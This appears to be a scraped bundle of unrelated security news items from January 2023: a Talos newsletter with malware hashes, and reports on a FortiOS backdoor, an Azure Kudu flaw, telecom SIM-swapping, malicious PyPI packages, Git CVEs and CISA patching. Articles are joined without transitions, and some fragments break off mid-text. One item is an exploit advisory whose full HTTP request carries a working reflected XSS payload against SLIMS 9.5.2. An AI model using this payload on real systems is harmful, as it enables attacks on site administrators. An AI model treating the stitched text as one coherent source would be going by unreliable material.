Talent retention and institutional knowledge go hand in hand. Both are critical to ensuring the security of your network environment.

Thursday, January 19, 2023 16:01

Welcome to this week’s edition of the Threat Source newsletter.

Talent retention and institutional knowledge go hand in hand. Both are critical to ensuring the security of your network environment. To that end, I want to talk briefly about why talent retention isn’t just about money. So I am going to speak directly to the people managers from the team leads in the SOC to the C-Level execs. When you examine what you do on a day-to-day basis are you telling your team members what they can and can’t do? How often do the things you say and the goals you provide fall between those two things? Now, ask yourself what you’ve done to enable them to grow today, both technically and as people. One of the easiest ways to very quickly identify quality leadership is to find out if the mindset and actions of the people managers is that the employees work for and reflect on them, or if they understand that they work for the team and that the team is a reflection of their leadership. Yes, there are plenty of employees that will leave simply based on pay, and we all have budgets to work within – but there is no cost to show respect and fighting to find budget for pet projects, training, or even niche learning for your employees is your job. When you can’t find budget find other ways to show the employees that you respect them and are actively working to ensure their growth. In the end your efforts will be rewarded with a stronger team and a more secure environment.

**The one big thing**

Focus on the basics. As we run headlong into the impending brick wall of 2023 take a moment to look at your environment and simply relearn it.

**Why do I care?**

Without knowing your baseline environment there is absolutely no way that you can expect to protect it.

**So now what?**

Learn your network. Observe and reevaluate your physical security standards in this crazy post pandemic world. Ensure that your patch management strategy is sound and that you have good cross-team collaboration to get those change windows handled. Ensure dead accounts are handled correctly. On and on – you know the steps. Take a beat and follow them.

**Top security headlines of the week**

Yum Brands, the parent company of fast-food chains KFC, Pizza Hut and Taco Bell, has confirmed that company data was stolen in a ransomware attack.

Yum Brands said a ransomware attack impacted “certain information technology systems,” prompting the chain to take some of its systems offline. The incident also led to the closure of roughly 300 restaurants in the United Kingdom for 24 hours, the company said. Although the ransomware attack largely affected the company’s U.K. operations, Yum Brands said it notified U.S. federal law enforcement as its investigation continues. (Tech Crunch and Yum)

Initial Access Broker market is booming, posing growing threat to enterprises. Research shows a sharp year-over-year growth in the number of IABs operating in underground forums and markets. For ransomware operators and other cybercriminals that are looking for quick access to enterprise networks, these brokers are the answer. (Dark Reading and GroupIB)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/following-the-lnk-metadata-trail/
*   https://blog.talosintelligence.com/talos-year-in-review-2022/
*   https://talosintelligence.com/podcasts/shows/beers\_with\_talos
*   https://talostakes.talosintelligence.com/2018149/12016411-year-in-review-apt-summary-edition

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)  
Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256:

125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

Threat Source newsletter (Jan. 19, 2023): Talent retention and institutional knowledge

The "BoldMove" backdoor demonstrates a high level of knowledge of FortiOS, according to Mandiant researchers, who said the attacker appears to be based out of China.

Researchers analyzing data associated with a recently disclosed zero-day vulnerability in Fortinet's FortiOS SSL-VPN technology have identified a sophisticated new backdoor specifically designed to run on Fortinet's FortiGate firewalls.

The malware appears to be the work of a China-based threat actor engaged in cyber-espionage operations targeting government organizations and those working with these organizations. It is the latest example of adversaries from the country targeting firewalls, IPS, IDS, and other Internet-facing technologies that enterprises use for securing their networks, Mandiant said in a report this week.

Researchers from the company came across the malware in a public repository in December and were able to tie it to the Fortinet zero-day bug (CVE-2022-42475) based on information that Fortinet released in its initial vulnerability disclosure. The vulnerability allows an unauthenticated attacker to execute arbitrary code on affected systems and is present in multiple versions of Fortinet's FortiOS and FortiProxy technologies. When Fortinet disclosed the vulnerability, the company said it was aware of at least one incident where an attacker had exploited the flaw in the wild.

**BoldMove Backdoor**

Mandiant said the malware it discovered in December — and is tracking as "BoldMove" — is associated with the exploitation of CVE-2022-42475. Available telemetry suggests that exploit activity associated with the malware was occurring as early as October 2022. Targets have included a government entity in Europe and a managed services provider in Africa.

The BoldMove backdoor, written in C, comes in two flavors: a Windows version and a Linux version that the threat actor appears to have customized for FortiOS, Mandiant said. When executed, the Linux version of the malware first attempts to connect to a hardcoded command-and-control (C2) server. If successful, BoldMove collects information about the system on which it has landed and relays it to the C2. The C2 server then relays instructions to the malware that ends with the threat actor gaining full remote control of the affected FortiOS device.

Ben Read, director of cyber-espionage analysis at Mandiant, says some of the core functions of the malware, such as its ability to download additional files or open a reverse shell, are fairly typical of this type of malware. But the customized Linux version of BoldMove also includes capabilities to manipulate specific features of FortOS.

"The implementation of these features shows an in-depth knowledge of the functioning of Fortinet devices," Read says. "Also notable is that some of the Linux variants features appear to have been rewritten to run on lower-powered devices."

The adversary appears to have compiled the Windows version of BoldMove sometime in 2021, or well before the Linux version. Mandiant so far has not detected any exploit activity in the wild associated with that version. "The Windows sample we have is 32-bit, so \[it\] should run on most modern versions of Windows but could be compiled to run on 64-bit machines," Read says. It would not run on a Fortinet device, however.

**Tech Chops**

The new cyber-espionage campaign and the BoldMove malware that the attackers are using in the campaign continue a pattern among China-based threat actors — and advanced persistent threats from other nations as well — to target firewalls, IPS, IDS, and other network security devices.

Developing exploits for these technologies can be challenging and require substantial resources and technical chops.

With BoldMove, "the attackers not only developed an exploit, but malware that shows an in-depth understanding of systems, services, logging, and undocumented proprietary formats," Mandiant said. But the payoff for attackers can be high because a successful exploit gives them wide access to a network, without requiring any user interaction, the security vendor added.

While Fortinet's products have been an especially popular target in this regard, threat actors have targeted products from other vendors as well, including Pulse Secure VPNs, Citrix ADCs, and SonicWall. The attacks have prompted multiple advisories from the FBI, the US Cybersecurity and Information Security Agency (CISA), and others.

**Schooled in FortiOS**

Meanwhile, Fortinet itself last week described the malware associated with CVE-2022-42475 as a variant of a "generic" Linux backdoor that the threat actor has customized for FortiOS. The company said its analysis showed the malicious file may have been masquerading as a component of Fortinet's IPS engine on compromised systems.

Among the malware's more advanced features was one for manipulating FortiOS logging to avoid detection, Fortinet said. The malware can look for event logs in FortiOS, to decompress them in memory and search for and delete a specific string that enables it to reconstruct the logs. The malware can also shut down logging processes entirely.

"The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet said.

According to Fortinet, developing the exploit would have required the threat actor to have a "deep understanding" of FortiOS and the underlying hardware. "The use of custom implants shows that the actor has advanced capabilities, including reverse-engineering various parts of FortiOS," the vendor said.

Attackers Crafted Custom Malware for Fortinet Zero-Day

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

There's a fine line between a hacker and an attacker, but it pays to be proactive. Consider tests by ethical hackers, a red team, or pen testers, and then bolster your company's defenses against malicious attacks.

In the world of security, there is no completely secure application or piece of software. At any point in time, a new vulnerability can be discovered, or a new exploit disclosed. The significance of recent exploits such as Log4Shell and PrintNightmare has led many organizations to re-evaluate how they efficiently and effectively discover and patch vulnerabilities before they can be exploited by an attacker.

As most organizations have expanded their technology stacks to keep pace with IT modernization and to help streamline remote work productivity, there are a host of systems and applications that cybercriminals can now exploit to gain access to sensitive company data. Keeping track of the risks and vulnerabilities within each technology is an ongoing challenge for business leaders and security teams, especially as company data is often highly dispersed across technologies and housed within different platforms.

One way to begin the process of better protecting company assets from an attack revolves around being more selective about which vulnerabilities to spend resources on.

**Assess Threat Levels**

The priority of a threat or vulnerability is subjective and will vary depending on the size of the company, the industry it operates within, and the type of data it retains. Companies need to determine if a malicious threat is affecting something that is core to their operating system and how it may impact their business. Sometimes a threat is hibernating, waiting for local privilege escalations, at which point the attacker will strike. Companies need visibility into their vulnerabilities before the malicious hacker has a chance to attack.

To do this and determine the severity of a threat, security teams cannot rely strictly on scanners anymore. If an organization is only running the same scans that the hackers run, they're doing the bare minimum to prevent automated attacks. This may work in the short term ... until the company is specifically targeted for an attack. In this case, the bad guys will be doing much more than the scanners — they will be finding new vulnerabilities, chaining vulnerabilities together, and finding new attack vectors.

Organizations must have knowledge of the same exploits that hackers have,_before_the hackers do, and patch them. One of the best ways to achieve this is utilizing ethical hackers — red teams, pen testers, bug bounties. They go beyond just using scanners. Ethical hackers find vulnerabilities that aren't being scanned for and create proof of concepts for attacks.

**Play-by-Play of an Ethical Hacker**

Here's a quick synopsis of how an ethical hacker could work to protect your organization by exposing vulnerabilities in advance:

**Step 1:** Obtain access

Hackers can often buy access to a company's internal system through the Dark Web for only a few hundred dollars. Alternatively, they can find access through leaked credentials, phishing, or other social engineering strategies.

**Step 2:** Active reconnaissance

Once into the company's internal system, they perform broad reconnaissance, including a network sweep. By doing so, they can enumerate networks, services, directories on hosts, vulnerabilities, and privileges. Using command-line controls, the hacker can look for open ports, such as Web ports, server message blocks (SMB) ports used for network shares, and remote desktop ports for managing workstations.

**Step 3:** Check for low-hanging vulnerabilities

Why pick the lock when the door is left open? Ideally, an attacker would first hope to find vulnerabilities for SMB ports, such as SMBGhost or WannaCry. If the organization has done a good job patching those SMB vulnerabilities and hardened your system, an attacker would then need to continue looking for opportunities.

**Step 4:** Target weak applications

In the attack scenario, the hacker would eventually find a vulnerable unpatched application.

**Step 5**: Elevate privileges

Unless you've disabled any default setting, the hacker would then escalate privileges from a basic user to a system user almost instantly, without the user ever knowing.

**Step 6:** Pass-the-hash

The hacker could then look for any hashes left by high-level users who logged into the endpoint in the past. Once found, a pass-the-hash attack can be executed to get access to systems as the highly privileged user, without knowing the actual user's password.

**Step 7:** Extract privileged credentials

By eventually extracting the proper credentials, the attacker could then gain access to the Domain Controller, giving them host access to Windows domain resources, as well as more workstations and other servers within the domain. With this, the hacker could manipulate systems, exfiltrate sensitive information, and essentially do anything they wanted on the domain.

This synopsis sheds light for a security team on just how easily an attack could be possible. Yet because the hacker was on the organization's side, no damage was really done, and valuable insights were collected on where/how to patch any open attack vectors and reduce the risks of malicious attackers discovering them first.

**Hacker vs. Attacker?**

In the mind of many ethical hackers, one of the biggest questions is where to draw the line. Is it OK to take advantage of an exploit if the intent is to shed light on the vulnerability? Where does a demonstration of a proof of concept cross that line into unethical territory? Would something as benign as sending a harmless email from a company account or even just typing into a Word document deserve scrutiny?

There's a fine line between a hacker and an attacker. Hacking itself is not a crime; rather, it is the motive and how a hacker applies their knowledge that differentiates doing criminal work and doing good work. Whether it's a security team, a red team, or a pen-testing group, or just an individual who found a vulnerability, one should much rather want to know about it before a malicious hacker does. It's much more difficult to clean up an attack than it is to prevent it.

With the right intentions, hacking can make the world a safer place. Just make sure to get permission — stay legal and do it with the right authorizations. Most hackers are good citizens looking to make the world a safer place.

Ethically Exploiting Vulnerabilities: A Play-by-Play

A new critical remote code execution (RCE) flaw discovered impacting multiple services related to Microsoft Azure could be exploited by a malicious actor to completely take control of a targeted application.
"The vulnerability is achieved through CSRF (cross-site request forgery) on the ubiquitous SCM service Kudu," Ermetic researcher Liv Matan said in a report shared with The Hacker News. "By

Cloud Security / Data Security

A new critical remote code execution (RCE) flaw discovered impacting multiple services related to Microsoft Azure could be exploited by a malicious actor to completely take control of a targeted application.

"The vulnerability is achieved through CSRF (cross-site request forgery) on the ubiquitous SCM service Kudu," Ermetic researcher Liv Matan said in a report shared with The Hacker News. "By abusing the vulnerability, attackers can deploy malicious ZIP files containing a payload to the victim's Azure application."

The Israeli cloud infrastructure security firm, which dubbed the shortcoming **EmojiDeploy**, said it could further enable the theft of sensitive data and lateral movement to other Azure services.

Microsoft has since fixed the vulnerability as of December 6, 2022, following responsible disclosure on October 26, 2022, in addition to awarding a bug bounty of $30,000.

The Windows maker describes Kudu as the "engine behind a number of features in Azure App Service related to source control based deployment, and other deployment methods like Dropbox and OneDrive sync."

In a hypothetical attack chain devised by Ermetic, an adversary could exploit the CSRF vulnerability in the Kudu SCM panel to defeat safeguards put in place to thwart cross-origin attacks by issuing a specially crafted request to the "/api/zipdeploy" endpoint to deliver a malicious archive (e.g., web shell) and gain remote access.

The ZIP file, for its part, is encoded in the body of the HTTP request, prompting the victim application to navigate to an actor-control domain hosting the malware via the server's same-origin policy bypass.

Cross-site request forgery, also known as sea surf or session riding, is an attack vector whereby a threat actor tricks an authenticated user of a web application into executing unauthorized commands on their behalf.

"The impact of the vulnerability on the organization as a whole depends on the permissions of the applications managed identity," the company said. "Effectively applying the principle of least privilege can significantly limit the blast radius."

The findings come days after Orca Security revealed four instances of server-side request forgery (SSRF) attacks impacting Azure API Management, Azure Functions, Azure Machine Learning, and Azure Digital Twins.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Microsoft Azure Vulnerability Uncovered — Experts Warn of RCE Attacks

The growing use of mobile devices for MFA and the proliferation of 5G and VoIP in general could result in more attacks in future, experts say.

The growing use of mobile devices for multifactor authentication increasingly has made telecom providers a juicy target for cybercrime. An ongoing SIM card-swapping campaign by a Chinese threat actor called "Scattered Spider" is just the latest example of that trend.

Scattered Spider is an APT group that researchers from CrowdStrike have been tracking for the past several months. The group has been targeting telecom companies and business-process outsourcing (BPO) firms that support these telecom companies with the objective of gaining access to their respective carrier networks.

**SIM-Jacking Via the Carrier Network**

In at least two instances where the threat actor gained that access, they used it to do SIM swapping, a process where an adversary essentially transfers another person's phone number to their SIM card. Attackers can then use the hijacked phone number to access bank accounts or any other account where the legitimate user might have registered the phone as a second form of authentication. SIM jacking also gives attackers a way to register and associate rogue devices to accounts on compromised networks.

Bud Broomhead, CEO at Viakoo, says the wide use of mobile networks for multifactor authentication has painted a big target on telecom providers. "While there have always been efforts to breach telecom systems, the increased reliance on them for security has increased the frequency of attacks against them," he says.

In the campaigns that CrowdStrike observed, Scattered Spider gained initial access to a targeted telecom or BPO network by impersonating IT personnel and convincing individuals working at these organizations to part with their credentials or to grant remote access to their computers. Once inside the target environment the threat actors moved laterally across it — often using legitimate tools such as Windows Management Instrumentation — till they gained access to the carrier network.

The group has targeted multiple telecom firms since at least June 2022 and has simply kept moving to different targets each time it gets booted from one, prompting CrowdStrike to describe the campaign as an "extremely persistent and brazen" threat. Recently, CrowdStrike observed Scattered Spider deploy a malicious kernel driver via a vulnerability exploit as part of its attack chain.

Adam Meyers, senior vice president of intelligence at CrowdStrike, says Scattered Spider's campaign appears to be financially motivated and therefore different from the many attacks on carrier networks focused on cyber espionage.

"Based on what we have seen, they are focused on SIM swapping," Meyers says. "When you have two factor-authentication and do a SIM swap, you can bypass that authentication."

**Crime v. Espionage**

Campaigns like Scattered Spider represent a relatively new kind of attack on carrier networks. In recent years, many campaigns that targeted telecom companies have focused on some form of intelligence-gathering activity and have often involved advanced persistent threat groups from countries such as China, Iran, and Turkey, Meyers notes. The goal usually is to intercept communications and to harvest the detailed information available in call data records (CDRs), he says. CDRs can be very powerful for monitoring and tracking individuals, he says.

Back in 2019, Cybereason reported on one such campaign that it dubbed Operation Soft Cell, where a Chinese APT group infiltrated carrier networks belonging to a major telecommunication company to steal CDRs. The security vendor assessed at the time that the campaign had been active since at least 2012, giving the threat actor access to data that would have helped the government target politicians, foreign intelligence agencies, dissidents, law enforcement, and others.

In 2021, CrowdStrike reported on a multi-year campaign where a threat actor called Light Basin broke into at least 13 telecom networks worldwide and systematically stole Mobile Subscriber Identity (IMSI) data and call metadata on users. The threat actor installed tools on the carrier networks that allowed it to intercept call and text messages, call information, and records for tracking and monitoring targeted individuals.

More recently, Bitdefender reported observing a Chinese threat actor targeting a telecom firm in the Middle East in a cyber-espionage campaign. "The attack carries the hallmarks of BackdoorDiplomacy, a known APT group with ties to China," says Danny O’Neill, director of MDR operations at Bitdefender. The initial compromise used binaries vulnerable to side-loading techniques and likely involved an exploit of the ProxyShell vulnerability in Microsoft Exchange Server, he says.

"Once inside, the APT used multiple tools — some legit and some custom — and malware to spy, move laterally across the environment, and evade detection," he says.

**Catalysts for More Attacks?**

Meyers and others expect that the proliferation of 5G networks and VoIP services in general in coming years will make it easier for threat actors to execute these attacks on telecommunication companies. Newer telecom services such as 5G are susceptible to cyberattacks because everything — including the core networks — are software designed, O'Neill says. That means all the risks associated with software technologies will manifest on carrier networks as well, he says.

"There are going to be a greater number of cells, pico-cells, and micro-cells required to deliver the coverage given the much higher operating frequencies of 5G," O'Neill points out. From an attacker's perspective, this equates to more access and entry points, he says.

"The almost universal adoption of voice over IP technology has made pretty much every network a data network and blurred the lines between mediums," says Mike Parkin, senior technical engineer at Vulcan Cyber. "It's hard to separate old school voice telecommunication from today’s data networks," he says.

**Why Disruptive Cyberattacks Remain Rare**

One notable aspect of attacks on carrier networks is that very few so far have involved attempts to cause widespread service outages or sabotage — a major concern with attacks on organizations in other critical infrastructure sectors. In its 2019 report, Cybereason in fact had noted how the attackers could have used their access on the telecom network to do pretty much anything they had wanted: "A threat actor with total access to a telecommunications provider, as is the case here, can attack however they want passively and also actively work to sabotage the network."

That is an assessment that Meyers shares about the Scattered Spider campaign as well.

One reason why disruptive cyberattacks on telecom infrastructure might not have happened so far is because they are really not necessary.

"The primary motivation for attacks on signal-carrying networks is espionage," says John Bambenek, principal threat hunter at Netenrich. "Certainly, there are sabotage interests, but those are usually correlated to the proximity of physical conflict." As an example, he points to Russian attacks on Ukraine's telecom infrastructure at the start of the war.

Pulling off a disruptive cyberattack on a telecom network often is not needed because other, more straightforward options are available. "What we see many examples of is disruption due to physical means. Getting a little out of hand with a backhoe in the wrong place has disrupted communications for entire metropolitan areas," he says.

The shift to VoIP means old school tactics such as DDoS attacks could soon become an effective way to disrupt a carrier network, adds Parkin. Even so, other methods are easier, he says.

"A crowbar can gain access to a wiring trunk, and a pair of bolt cutters can make short work of the cables inside," Parkin says. "Taking out wireless communications takes more sophisticated equipment, but a couple of signal jammers could take down a surprisingly large area."

**Regs to the Rescue**

Going forward, governments and regulatory bodies will have to take a more active role in ensuring the security of the telecom sector against cyberattacks. Parkin points to recent steps by the US, UK, and other governments to mitigate against perceived "high risk" vendors and equipment manufacturers that sit at the core of telco networks as an example of what's needed in future.

"Government influence in achieving end-to-end cybersecurity should focus foremost on governance and regulatory requirements," O'Neill notes. "Existing policies and standards need to be developed and strengthened to incorporate new services like 5G."

He fears that operators, if left unchecked, could default to focusing on availability and convenience at the expense of security.

Cybercriminals Target Telecom Provider Networks

While tracking some prevalent commodity malware threat actors, Talos observed the popularization of malicious LNK files as their initial access method to download and execute payloads. A closer look at the LNK files illustrates how their metadata could be used to identify and track new campaigns.

Following the LNK metadata trail

By Deeba Ahmed
These packages were uploaded between the 7th and 12th of January 2023 with the names "colorslib," "httpslib," and "libhttps."
This is a post from HackRead.com Read the original post: Malicious PyPI Packages Drop Malware in New Supply Chain Attack

The malicious packages were uploaded by a threat actor using the alias “Lolip0p,” who dropped info-stealing malware on targeted devices.

Fortinet FortiGuard Labs’ researchers have discovered three **malicious PyPI repositories**. According to their analysis, these packages are designed to infect compromised devices with malware.

For your information, PyPI (Python Package Index) is the world’s most widely used repository for Python packages used by software developers building projects. Threat actors often use malicious packages against Python developers. **Just a couple of months ago**, malicious packages were found swapping out the crypto addresses of Python developers.

Further probe revealed that the packages were uploaded by a threat actor using the alias Lolip0p. The rogue packages contain code that **drops info-stealing malware** on the developer’s device.

**According to** researchers, these packages were uploaded between 7th and 12th January 2023 with the names’ colorslib’ versions 4.6.11 and 4.6.12, ‘httpslib’ versions 4.6.9 and 4.6.11, and ‘libhttps’ version 4.6.12.

However, all malicious packages were removed from the PyPI on January 17th, 2023 after Fortinet tipped them. However, by that time, the packages had been downloaded more than 550 times. Pepy.tech, a PyPI package stat counting service, broke down the download count of these packages by the time these were removed.

*   Colorslib – 248 downloads
*   httpslib – 233 downloads
*   libhttps – 68 downloads

Moreover, the threat actors can reupload them later if they want to. Hence, the threat isn’t over yet. These modules contain similar setup scripts created to invoke PowerShell and execute a malicious binary titled Oxzy.exe, which is also distributed as a free Discord Nitro generator. This file is hosted on **Dropbox**. When this executable is launched, another binary titled update.exe is retrieved, which runs the Windows temporary folder stored at (“%USER%\\AppData\\Local\\Temp\\”).

This second file contains an information stealer that can also drop additional binaries. Microsoft reports that one of these binaries is Wacatac. The trojan can perform numerous actions, such as launching ransomware and different payloads.

The creator of these packages has made them appear legitimate and harmless by including a “convincing project description,” stated Fortinet researcher Jin Lee. But these packages actually download and run the malicious binary executable.

Users must exercise caution when downloading/running packages from unreliable sources to evade **supply chain attacks**.

1.  Gentoo Linux on Github hacked; repositories modified
2.  GitHub fixes critical flaw that exposed repositories to attackers
3.  Thousands of GitHub Repositories Cloned in Supply Chain Attack
4.  6 official Python repositories plagued with cryptomining malware
5.  Typosquatting used in trojanizing 700 libraries in Ruby Repository

Malicious PyPI Packages Drop Malware in New Supply Chain Attack

CVE-2022-23521 and CVE-2022-41903 are critical flaws present in Git's code. Thankfully, they’ve been addressed in its latest version.



(Read more...)




The post Update now! Two critical flaws in Git's code found, patched appeared first on Malwarebytes Labs.

In a sponsored security source code audit, security experts from X41 D-SEC GmbH (Eric Sesterhenn and Markus Vervier) and GitLab (Joern Schneeweisz) found two notable critical flaws in Git's code. A vulnerability on Git could generally compromise source code repositories and developer systems, but "wormable" ones could result in large-scale breaches, according to the high-level audit report. Microsoft defines a flaw as "wormable" if it doesn’t rely on human interaction, instead it allows malware to spread from one vulnerable system to another.

The two critical flaws, tracked as **CVE-2022-23521** and **CVE-2022-41903**, could allow threat actors to potentially run malware after taking advantage of overflow weaknesses in a system's memory.

A total of eight vulnerabilities were found in Git's code. On top of the critical ones we mentioned, the experts also found one rated medium, one high, and four rated low severity. 27 other issues found don’t have a direct security impact.

A copy of the full audit report from X41 and GitLab can be found here.

**Recommendation and workaround**

The easiest way to protect against exploits of these critical vulnerabilities is to upgrade to the latest Git release, which is version **2.39.1**, as well as update your GitLab instance to one of these versions: **15.7.5**, **15.6.6**, and **15.5.9**. 

*   How to update GitLab
*   How to update GitLab Runner

Version 2.39.1 of Git for Windows also addresses the flaw tracked as CVE-2022-41953.

The researchers recommend those using Git continue to use safe wrappers and develop strategies to mitigate common memory safety issues. They also discouraged storing length values to signed integer typed variables.

> "Introducing generic hardenings such as sanity checks on data input length, and the use of safe wrappers can improve the security of the software in the short term. The usage of signed integer typed variables to store length values should be banned. Additionally, the software could benefit from compiler level checks regarding the use of integer and long variable types for length and size values. Enabling the related compiler warnings during the build process can help identify the issues early in the development process."

Per BleepingComputer, users who cannot upgrade to address CVE-2022-41903 may want to apply this workaround instead:

*   Disable 'git archive' in untrusted repositories or avoid running the command on untrusted repos
*   If 'git archive' is exposed via 'git daemon,' disable it when working with untrusted repositories by running the 'git config --global daemon.uploadArch false' command

**CVE-2022-23521: Truncated Allocation Leading to Out-of-bounds (OOB) Write**

An OOB Write occurs when software writes data at the beginning or end of a buffer, resulting to data corruption, a system crash, or code execution. OOB Write is a flaw classed as a heap-based buffer overflow.

This flaw triggers when Git parses a crafted _.gitattributes_ file that may be part of a commit history, causing multiple integer overflows (also known as wraparounds). This means the program is trying to store a huge value or number more than an integer type can store.

If this happens, OOB reads and writes can occur, which could then lead to remote code execution.

**CVE-2022-41903: OOB Write in Log Formatting**

This flaw is found in Git’s commit-formatting mechanism, which displays arbitrary information on commits. When Git processes a padding operator, an integer overflow can occur. OOB reads and writes can occur out of the overflow, leading to remote code execution if exploited.

A detailed, technical dive into these vulnerabilities are in the full audit report.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Update now! Two critical flaws in Git's code found, patched

<h3>Implementing the CISA known exploited vulnerability mandate with greater ease</h3>

<p><br />
<img alt="" height="229" src="https://lh4.googleusercontent.com/xGj9oBUjSLNwwGwJq9ZIrzXXkhqhmFUFuEzmO7_Zu1zGXT8_s8vBfnXCOE8arv0FJIDYRQJ9wdjymsY1mmzIWsuhELntj4oY1QdPY1FzL0xrnB56jMVXmw80nbXALoHtq3Z5ngkuBsOyjDt3820LNrtKXkvjUM5LW5tjPVQYbIvt_1ZROpZX0BAdqEFyNQ" width="357" /></p>

<p><em>Source: <a href=&qu

**Implementing the CISA known exploited vulnerability mandate with greater ease**

  

_Source: Wikipedia_

The term “patching” dates back to the days of punch cards when a programmer would literally patch a hole in a punch card to correct a bug. This allowed the programmer to correct mistakes without re-punching the entire card. What a painfully manual process that would have been to scale!

We have come a long way since the mid-twentieth century when this technique was used, but patching is as prevalent—if not significantly more so—today as ever as the threat landscape is evolving more rapidly and software release cycles shorten.

“As long as we have software we will have to update it,” is a phrase common among IT professionals. There are a variety of reasons to require an update: performance or bug fixes, regulatory or vendor support requirements, or security vulnerabilities in systems. Patching also protects against security vulnerabilities like data breaches or attackers gaining control of a system. In severe cases, this leads to consequences far beyond the health and stability of the system.

**The cost of data breaches**

The 2022 IBM Cost of a Data Breach report says that 83% of organizations will experience a data breach more than once, and the organizations that are using automation have a 74-day shorter recovery time. A notable data point from the report stated that organizations with automated security responses saved approximately US$3 million per breach, which represented the largest cost savings opportunity examined in the study.

Additionally, the report found that “vulnerabilities in third-party software” is a leading attack vector and cost factor of data breaches where the ability of an organization to keep third-party software up to date plays a critical role in maintaining a strong security posture.

**Binding operational directive**

The importance of patching known vulnerabilities and the impact that these exploits can have has led the Cybersecurity and Infrastructure Security Agency (CISA) to issue a binding operational directive to reduce “the significant risk of known exploited vulnerabilities.” The Binding Operational Directive 22-01 states that federal Civilian Executive Branch agencies are required to comply with the following actions (summarized):

1.  Within 60 days of issuance \[of the directive\], agencies shall review and update agency internal vulnerability management procedures in accordance with this Directive. 
2.  Remediate each vulnerability according to the timelines set forth in the CISA-managed vulnerability catalog. For Common Vulnerabilities and Exposures (CVEs) assigned prior to 2021, vulnerabilities must be remediated within six months, and within two weeks for all others.
3.  Agencies are expected to automate data exchange and report their respective Directive implementation status through the Continuous Diagnostics and Mitigation (CDM) Federal Dashboard.

Are you prepared to update a vulnerability across your Linux, Windows, networking, cloud and other infrastructure within two weeks? Would this require an all-hands-on-deck response? How will you keep pace with other projects and new innovations if you are spending all your time reacting to threats instead of taking a proactive approach? It’s important to note that the CISA directive is specifically targeted toward known exploited vulnerabilities which account for a small number of overall vulnerabilities present in software as detailed here. Nonetheless, automating the swift remediation of the CISA documented vulnerabilities puts your agency in a better position to respond regardless of severity. 

**Security automation with Ansible Automation Platform**

**Red Hat Ansible Automation Platform** helps meet these requirements with a comprehensive enterprise automation solution and supported integrations for your infrastructure. Ansible Automation Platform appears on CISA’s approved product list for the CDM program to automate the deployment of remediations.

Ansible Automation Platform is uniquely positioned to address this challenge more rapidly as it is built using a common automation language that can be more easily learned and implemented across IT teams. Furthermore, Ansible builds a bridge to collaborating with application or infrastructure owners to implement testing capabilities that break down silos across traditional IT structures allows agencies to react faster without adding additional risk to system stability.

_Source: Ansible.com_

